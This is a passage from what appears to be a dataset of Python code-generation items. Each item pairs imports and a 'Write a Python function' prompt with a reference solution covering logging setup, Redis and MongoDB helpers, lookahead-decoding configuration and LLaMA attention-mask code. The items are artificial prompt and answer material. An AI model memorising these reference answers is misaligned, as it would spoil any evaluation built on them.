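print(is_valid_input("Plot the sales data by month"))         # True
print(is_valid_input("word " * 5000, max_token_limit=2000))   # False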
188,463 | import os
import sys
import base64
from pathlib import Path
from typing import Any, Dict, Tuple, Union
import pandas as pd
import tiktoken
from flask import Request
from sqlalchemy import create_engine
from PIL import Image
from loguru import logger
from real_agents.adapters.data_model import (
DatabaseDataModel,
DataModel,
ImageDataModel,
TableDataModel,
KaggleDataModel,
)
from real_agents.data_agent import (
DataSummaryExecutor,
TableSummaryExecutor,
ImageSummaryExecutor,
)
from real_agents.adapters.schema import SQLDatabase
from backend.utils.running_time_storage import get_running_time_storage
from backend.app import app
from backend.schemas import DEFAULT_USER_ID
The provided code snippet includes necessary dependencies for implementing the `init_log` function. Write a Python function `def init_log(**sink_channel)` to solve the following problem:
Initialize loguru log information
Here is the function:
def init_log(**sink_channel):
"""Initialize loguru log information"""
# Just for sys.stdout log message
format_stdout = (
"<g>{time:YYYY-MM-DD HH:mm:ss}</g> | <lvl>{level}</lvl> - {extra[user_id]}++{extra[chat_id]}-><y>{extra[api]}</y> "
"<LC>{extra[msg_head]}</LC>:{message}"
)
# Avoid unexpected KeyError
# Do not unpack key-value pairs, but save all records.
format_full_extra = (
"<g>{time:YYYY-MM-DD HH:mm:ss}</g> | <lvl>{level}</lvl> - <c><u>{name}</u></c> | {message} - {extra}"
)
logger.remove()
logger.configure(
handlers=[
dict(sink=sys.stdout, format=format_stdout, level="TRACE"),
dict(
sink=sink_channel.get("error"),
format=format_full_extra,
level="ERROR",
diagnose=False,
rotation="1 week",
),
dict(
sink=sink_channel.get("runtime"),
format=format_full_extra,
level="DEBUG",
diagnose=False,
rotation="20 MB",
retention="20 days",
),
dict(
sink=sink_channel.get("serialize"),
level="DEBUG",
diagnose=False,
serialize=True,
),
],
extra={"user_id": "", "chat_id": "", "api": "", "msg_head": ""},
)
return logger | Initialize loguru log information |
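A hypothetical wiring of the three sinks; the file paths are examples only:
logger = init_log(
    error="logs/error.log",
    runtime="logs/runtime.log",
    serialize="logs/serialize.log",
)
logger.bind(user_id="u1", chat_id="c1", api="/chat", msg_head="Demo").info("service started")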
188,464 | import redis
from flask import g
import os
The provided code snippet includes necessary dependencies for implementing the `get_running_time_storage` function. Write a Python function `def get_running_time_storage()` to solve the following problem:
Connects to redis.
Here is the function:
def get_running_time_storage():
"""Connects to redis."""
if "running_time_storage" not in g:
g.running_time_storage = redis.Redis(host=os.getenv("REDIS_SERVER"), port=6379, decode_responses=True)
        # Set maxmemory to 500MB (value is in bytes)
g.running_time_storage.config_set("maxmemory", "500000000")
# Set maxmemory policy to allkeys-lru (Least Recently Used)
g.running_time_storage.config_set("maxmemory-policy", "allkeys-lru")
return g.running_time_storage | Connects to redis. |
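A usage sketch inside a Flask application context, assuming a reachable Redis instance and the REDIS_SERVER environment variable; the throwaway app and key names are illustrative:
from flask import Flask

app = Flask(__name__)
with app.app_context():
    cache = get_running_time_storage()
    cache.set("chat:123:status", "running")
    print(cache.get("chat:123:status"))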
188,465 | import pymongo
from flask import g
import os
The provided code snippet includes necessary dependencies for implementing the `close_user_conversation_storage` function. Write a Python function `def close_user_conversation_storage()` to solve the following problem:
Closes mongodb.
Here is the function:
def close_user_conversation_storage():
"""Closes mongodb."""
user_conversation_storage = g.pop("user_conversation_storage", None)
if user_conversation_storage is not None:
user_conversation_storage["xlang"].close() | Closes mongodb. |
188,466 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
CONFIG_MAP = {}
def config_lade(WINDOW_SIZE=None, LEVEL=None, DEBUG=None, GUESS_SET_SIZE=None, ALWAYS_FWD_ONE=None, SPLIT_FLAG=None, DIST_WORKERS=None, POOL_FROM_PROMPT=None, backend = 'nccl', USE_FLASH=None):
if WINDOW_SIZE is not None:
CONFIG_MAP["WINDOW_SIZE"] = WINDOW_SIZE
if LEVEL is not None:
CONFIG_MAP["LEVEL"] = LEVEL
if GUESS_SET_SIZE is not None:
CONFIG_MAP["GUESS_SET_SIZE"] = GUESS_SET_SIZE
if ALWAYS_FWD_ONE is not None:
CONFIG_MAP["ALWAYS_FWD_ONE"] = ALWAYS_FWD_ONE
if DEBUG is not None:
CONFIG_MAP["DEBUG"] = DEBUG
if SPLIT_FLAG is not None:
CONFIG_MAP["SPLIT_FLAG"] = SPLIT_FLAG
if POOL_FROM_PROMPT is not None:
CONFIG_MAP["POOL_FROM_PROMPT"] = POOL_FROM_PROMPT
if DIST_WORKERS is not None and DIST_WORKERS > 1:
CONFIG_MAP["DIST_WORKERS"] = DIST_WORKERS
CONFIG_MAP["LOCAL_RANK"] = int(os.environ["LOCAL_RANK"])
dist.init_process_group(backend, rank=CONFIG_MAP["LOCAL_RANK"])
torch.cuda.set_device(CONFIG_MAP["LOCAL_RANK"])
        assert dist.get_world_size() == DIST_WORKERS, "DIST_WORKERS config should be equal to world size"
if USE_FLASH is not None:
CONFIG_MAP["USE_FLASH"] = USE_FLASH
CONFIG_MAP["log"] = [] | null |
188,467 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
def augment_llama():
inject_module(lade_modeling_llama, modeling_llama)
#llama.modeling_llama.LlamaForCausalLM = lade_modeling_llama.LlamaForCausalLM
#modeling_llama.LlamaForCausalLM.jforward_multilevel = lookahead_llama.jforward_multilevel
#modeling_llama.LlamaModel.LlamaModeljforward = lookahead_llama.LlamaModeljforward
#modeling_llama.LlamaModel.j_prepare_decoder_attention_mask = lookahead_llama.j_prepare_decoder_attention_mask
def augment_generate():
FUNC_MAP["greedy_search"] = GenerationMixin.greedy_search
FUNC_MAP["sample"] = GenerationMixin.sample
GenerationMixin.greedy_search = greedy_search_proxy
GenerationMixin.sample = sample_proxy
#FUNC_MAP["sample"] = GenerationMixin.sample
#GenerationMixin.sample = sample_proxy
def augment_all():
augment_llama()
augment_generate() | null |
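A hypothetical initialization sequence combining the helpers above; it assumes config_lade and augment_all are exported at the lade package level (the eval scripts later in this file call lade.get_device() the same way), and the tuning values are examples, not mandated settings:
import lade

lade.augment_all()   # patch LlamaForCausalLM and GenerationMixin with the lookahead proxies
lade.config_lade(LEVEL=5, WINDOW_SIZE=7, GUESS_SET_SIZE=7, DEBUG=0)
# load the model/tokenizer as usual; subsequent model.generate(...) calls use lookahead decoding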
188,468 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
CONFIG_MAP = {}
def log_history(clear=False):
gen = 0
step = 0
if "log" in CONFIG_MAP:
for log in CONFIG_MAP["log"]:
gen += log[0]
step += log[1]
if clear:
CONFIG_MAP["log"] = []
print("LADE LOG - OVERALL GEN: ", gen, " STEPS: ", step, " AVG COMPRESS RATIO: ", (gen / step) if step > 0 else 0) | null |
188,469 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
CONFIG_MAP = {}
def save_log(log_dir):
if "log" in CONFIG_MAP:
torch.save(CONFIG_MAP["log"], log_dir) | null |
188,470 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
def get_hf_model(model_path, quant, dtype, device, cache_dir):
tokenizer = AutoTokenizer.from_pretrained(model_path, fast_tokenizer=True)
model_config = AutoConfig.from_pretrained(model_path)
assert quant is None or len(quant) == 0
model = AutoModelForCausalLM.from_pretrained(
model_path, torch_dtype=dtype, device_map=device, cache_dir=cache_dir if len(cache_dir) > 0 else None)
model = model.eval()
model.tokenizer = tokenizer
return model, tokenizer
def get_model(model_path, quant, dtype, device, cache_dir, use_ds, native_offload = False):
return get_hf_model(model_path, quant, dtype, device, cache_dir) | null |
188,471 | import torch
import os
from .decoding import CONFIG_MAP
CONFIG_MAP = {}
def get_device():
if "LOCAL_RANK" not in CONFIG_MAP:
return 0
local_rank = CONFIG_MAP["LOCAL_RANK"]
return local_rank | null |
188,472 | import torch
import os
from .decoding import CONFIG_MAP
CONFIG_MAP = {}
def distributed():
return "DIST_WORKERS" in CONFIG_MAP and CONFIG_MAP["DIST_WORKERS"] > 1 | null |
188,473 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
def _get_unpad_data(attention_mask):
seqlens_in_batch = attention_mask.sum(dim=-1, dtype=torch.int32)
indices = torch.nonzero(attention_mask.flatten(), as_tuple=False).flatten()
max_seqlen_in_batch = seqlens_in_batch.max().item()
    cu_seqlens = F.pad(torch.cumsum(seqlens_in_batch, dim=0, dtype=torch.int32), (1, 0))
return (
indices,
cu_seqlens,
max_seqlen_in_batch,
) | null |
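A worked example of what the helper returns for a two-sequence batch (lengths 3 and 2, right-padded to 4):
import torch

attention_mask = torch.tensor([[1, 1, 1, 0],
                               [1, 1, 0, 0]])
indices, cu_seqlens, max_len = _get_unpad_data(attention_mask)
print(indices)      # tensor([0, 1, 2, 4, 5]) - flat positions of the real tokens
print(cu_seqlens)   # tensor([0, 3, 5], dtype=torch.int32) - cumulative sequence lengths
print(max_len)      # 3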
188,474 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):
warnings.warn(
"Calling `transformers.models.llama.modeling_llama._prepare_4d_attention_mask` is deprecated and will be removed in v4.37. Use `transformers.modeling_attn_mask_utils._prepare_4d_attention_mask"
)
return _prepare_4d_attention_mask(mask=mask, dtype=dtype, tgt_len=tgt_len) | null |
188,475 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
The provided code snippet includes necessary dependencies for implementing the `_make_causal_mask` function. Write a Python function `def _make_causal_mask( input_ids_shape: torch.Size, dtype: torch.dtype, device: torch.device, past_key_values_length: int = 0 )` to solve the following problem:
Make causal mask used for bi-directional self-attention.
Here is the function:
def _make_causal_mask(
input_ids_shape: torch.Size, dtype: torch.dtype, device: torch.device, past_key_values_length: int = 0
):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz, tgt_len = input_ids_shape
mask = torch.full((tgt_len, tgt_len), torch.finfo(dtype).min, device=device)
mask_cond = torch.arange(mask.size(-1), device=device)
mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)
mask = mask.to(dtype)
if past_key_values_length > 0:
mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype, device=device), mask], dim=-1)
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length) | Make causal mask used for bi-directional self-attention. |
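A worked example: the mask built for 3 new tokens with 2 cached key/value positions (1 marks positions a query may attend to):
import torch

mask = _make_causal_mask(torch.Size([1, 3]), torch.float32,
                         device=torch.device("cpu"), past_key_values_length=2)
print(mask.shape)               # torch.Size([1, 1, 3, 5])
print((mask[0, 0] == 0).int())
# tensor([[1, 1, 1, 0, 0],
#         [1, 1, 1, 1, 0],
#         [1, 1, 1, 1, 1]], dtype=torch.int32)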
188,476 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
The provided code snippet includes necessary dependencies for implementing the `j_make_causal_mask_multilevel` function. Write a Python function `def j_make_causal_mask_multilevel( level_sizes: list,is_prefill:bool, WINDOW_SIZE: int, guess : list, guess_size: int, not_seq:bool, continue_all:bool,input_ids_shape: torch.Size, dtype: torch.dtype, la_mask_offset:int, device: torch.device, past_key_values_length: int = 0 )` to solve the following problem:
Make causal mask used for bi-directional self-attention.
Here is the function:
def j_make_causal_mask_multilevel(
level_sizes: list,is_prefill:bool, WINDOW_SIZE: int, guess : list, guess_size: int, not_seq:bool, continue_all:bool,input_ids_shape: torch.Size, dtype: torch.dtype, la_mask_offset:int, device: torch.device, past_key_values_length: int = 0
):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz, tgt_len = input_ids_shape
mask = torch.full((tgt_len, tgt_len), torch.finfo(dtype).min, device=device)
if is_prefill:
mask_cond = torch.arange(mask.size(-1), device=device)
mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)
mask = mask.to(dtype)
assert past_key_values_length == 0
assert guess is None
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length)
tiny_mask_size = level_sizes[-1] # + 1
mask_cond = torch.arange(tiny_mask_size, device=device)
hm = mask_cond < (mask_cond + 1).view(tiny_mask_size, 1)
level_offset = tgt_len - (sum(level_sizes) + 1) - (len(guess) if guess is not None else 0) #offset when you guess multiple tokens and not copy kv-cache
dist_offset = (1 + level_sizes[0] - level_sizes[-1]) #offset for distributed inference
assert dist_offset>=0 and level_offset>=0
if guess is not None:
lguess = len(guess)
if guess_size == 2:
small_m = torch.tensor([0, torch.finfo(dtype).min]).repeat(lguess // 2)[:-1]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m, -1)
elif guess_size == 3:
small_m1 = torch.tensor([0, 0, torch.finfo(dtype).min]).repeat(lguess // 3)[:-1]
small_m2 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 3)[:-2]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2)
elif guess_size == 4:
small_m1 = torch.tensor([0, 0, 0, torch.finfo(dtype).min]).repeat(lguess // 4)[:-1]
small_m2 = torch.tensor([0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 4)[:-2]
small_m3 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 4)[:-3]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2).diagonal_scatter(small_m3, -3)
elif guess_size == 5:
small_m1 = torch.tensor([0, 0, 0, 0, torch.finfo(dtype).min]).repeat(lguess // 5)[:-1]
small_m2 = torch.tensor([0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 5)[:-2]
small_m3 = torch.tensor([0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 5)[:-3]
small_m4 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 5)[:-4]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2).diagonal_scatter(small_m3, -3).diagonal_scatter(small_m4, -4)
elif guess_size == 6:
small_m1 = torch.tensor([0, 0, 0, 0, 0, torch.finfo(dtype).min]).repeat(lguess // 6)[:-1]
small_m2 = torch.tensor([0, 0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 6)[:-2]
small_m3 = torch.tensor([0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 6)[:-3]
small_m4 = torch.tensor([0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 6)[:-4]
small_m5 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 6)[:-5]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2).diagonal_scatter(small_m3, -3).diagonal_scatter(small_m4, -4).diagonal_scatter(small_m5, -5)
elif guess_size == 7:
small_m1 = torch.tensor([0, 0, 0, 0, 0, 0, torch.finfo(dtype).min]).repeat(lguess // 7)[:-1]
small_m2 = torch.tensor([0, 0, 0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-2]
small_m3 = torch.tensor([0, 0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-3]
small_m4 = torch.tensor([0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-4]
small_m5 = torch.tensor([0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-5]
small_m6 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-6]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2).diagonal_scatter(small_m3, -3).diagonal_scatter(small_m4, -4).diagonal_scatter(small_m5, -5).diagonal_scatter(small_m6, -6)
else:
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0)
for i in range(guess_size - 1): #7 : 0 - 5
small_l = [0] * (guess_size - i - 1) + [torch.finfo(dtype).min] * (i + 1)
small_m = torch.tensor(small_l).repeat(lguess // guess_size)[:-1 - i]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].diagonal_scatter(small_m, -1 - i)
#assert False
mask[-lguess:,:level_offset + 1] = 0
else:
lguess = 0
all_offset = level_offset + dist_offset
if all_offset > 0:
mask_offset = torch.arange(all_offset, device=device)
moff = mask_offset < (mask_offset + 1).view(all_offset, 1)
mask[:all_offset, :all_offset].masked_fill_(moff, 0) #fill level_offset + dist_offset with causal mask
#
mask[all_offset:-lguess+mask.size(0),:all_offset] = 0
#assert tgt_len == sum(level_sizes) + 1 , f"tgt levels not equal {tgt_len} {level_sizes} {la_mask_offset}"
for ll in range(len(level_sizes)):
if ll > 0:
assert level_sizes[ll] == tiny_mask_size
mask[all_offset+tiny_mask_size*ll:all_offset+tiny_mask_size*(ll+1),all_offset:all_offset+tiny_mask_size].masked_fill_(hm, 0)
for row in range(1, ll + 1):
mask[all_offset+tiny_mask_size*ll:all_offset+tiny_mask_size*(ll+1),all_offset+tiny_mask_size*row:all_offset+tiny_mask_size*(row+1)].fill_diagonal_(0)
if past_key_values_length > 0 or la_mask_offset > 0:
mask = torch.cat([torch.zeros(tgt_len, past_key_values_length + la_mask_offset, dtype=dtype, device=device), mask], dim=-1)
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length + la_mask_offset) | Make causal mask used for bi-directional self-attention. |
188,477 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
def rotate_half(x):
"""Rotates half the hidden dims of the input."""
x1 = x[..., : x.shape[-1] // 2]
x2 = x[..., x.shape[-1] // 2 :]
return torch.cat((-x2, x1), dim=-1)
The provided code snippet includes necessary dependencies for implementing the `apply_rotary_pos_emb` function. Write a Python function `def apply_rotary_pos_emb(q, k, cos, sin, position_ids, unsqueeze_dim=1)` to solve the following problem:
Applies Rotary Position Embedding to the query and key tensors. Args: q (`torch.Tensor`): The query tensor. k (`torch.Tensor`): The key tensor. cos (`torch.Tensor`): The cosine part of the rotary embedding. sin (`torch.Tensor`): The sine part of the rotary embedding. position_ids (`torch.Tensor`): The position indices of the tokens corresponding to the query and key tensors. For example, this can be used to pass offsetted position ids when working with a KV-cache. unsqueeze_dim (`int`, *optional*, defaults to 1): The 'unsqueeze_dim' argument specifies the dimension along which to unsqueeze cos[position_ids] and sin[position_ids] so that they can be properly broadcasted to the dimensions of q and k. For example, note that cos[position_ids] and sin[position_ids] have the shape [batch_size, seq_len, head_dim]. Then, if q and k have the shape [batch_size, heads, seq_len, head_dim], then setting unsqueeze_dim=1 makes cos[position_ids] and sin[position_ids] broadcastable to the shapes of q and k. Similarly, if q and k have the shape [batch_size, seq_len, heads, head_dim], then set unsqueeze_dim=2. Returns: `tuple(torch.Tensor)` comprising of the query and key tensors rotated using the Rotary Position Embedding.
Here is the function:
def apply_rotary_pos_emb(q, k, cos, sin, position_ids, unsqueeze_dim=1):
"""Applies Rotary Position Embedding to the query and key tensors.
Args:
q (`torch.Tensor`): The query tensor.
k (`torch.Tensor`): The key tensor.
cos (`torch.Tensor`): The cosine part of the rotary embedding.
sin (`torch.Tensor`): The sine part of the rotary embedding.
position_ids (`torch.Tensor`):
The position indices of the tokens corresponding to the query and key tensors. For example, this can be
used to pass offsetted position ids when working with a KV-cache.
unsqueeze_dim (`int`, *optional*, defaults to 1):
The 'unsqueeze_dim' argument specifies the dimension along which to unsqueeze cos[position_ids] and
sin[position_ids] so that they can be properly broadcasted to the dimensions of q and k. For example, note
that cos[position_ids] and sin[position_ids] have the shape [batch_size, seq_len, head_dim]. Then, if q and
k have the shape [batch_size, heads, seq_len, head_dim], then setting unsqueeze_dim=1 makes
cos[position_ids] and sin[position_ids] broadcastable to the shapes of q and k. Similarly, if q and k have
the shape [batch_size, seq_len, heads, head_dim], then set unsqueeze_dim=2.
Returns:
`tuple(torch.Tensor)` comprising of the query and key tensors rotated using the Rotary Position Embedding.
"""
cos = cos[position_ids].unsqueeze(unsqueeze_dim)
sin = sin[position_ids].unsqueeze(unsqueeze_dim)
q_embed = (q * cos) + (rotate_half(q) * sin)
k_embed = (k * cos) + (rotate_half(k) * sin)
return q_embed, k_embed | Applies Rotary Position Embedding to the query and key tensors. Args: q (`torch.Tensor`): The query tensor. k (`torch.Tensor`): The key tensor. cos (`torch.Tensor`): The cosine part of the rotary embedding. sin (`torch.Tensor`): The sine part of the rotary embedding. position_ids (`torch.Tensor`): The position indices of the tokens corresponding to the query and key tensors. For example, this can be used to pass offsetted position ids when working with a KV-cache. unsqueeze_dim (`int`, *optional*, defaults to 1): The 'unsqueeze_dim' argument specifies the dimension along which to unsqueeze cos[position_ids] and sin[position_ids] so that they can be properly broadcasted to the dimensions of q and k. For example, note that cos[position_ids] and sin[position_ids] have the shape [batch_size, seq_len, head_dim]. Then, if q and k have the shape [batch_size, heads, seq_len, head_dim], then setting unsqueeze_dim=1 makes cos[position_ids] and sin[position_ids] broadcastable to the shapes of q and k. Similarly, if q and k have the shape [batch_size, seq_len, heads, head_dim], then set unsqueeze_dim=2. Returns: `tuple(torch.Tensor)` comprising of the query and key tensors rotated using the Rotary Position Embedding. |
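A shape-level usage sketch; cos and sin here are random stand-ins for the tables produced by the model's rotary embedding module, so only the shapes are meaningful:
import torch

bsz, heads, seq, head_dim = 1, 8, 4, 64
q = torch.randn(bsz, heads, seq, head_dim)
k = torch.randn(bsz, heads, seq, head_dim)
cos = torch.randn(16, head_dim)                  # [max_positions, head_dim] stand-in
sin = torch.randn(16, head_dim)
position_ids = torch.arange(seq).unsqueeze(0)    # [bsz, seq]
q_rot, k_rot = apply_rotary_pos_emb(q, k, cos, sin, position_ids)
print(q_rot.shape, k_rot.shape)                  # torch.Size([1, 8, 4, 64]) twice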
188,478 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
The provided code snippet includes necessary dependencies for implementing the `repeat_kv` function. Write a Python function `def repeat_kv(hidden_states: torch.Tensor, n_rep: int) -> torch.Tensor` to solve the following problem:
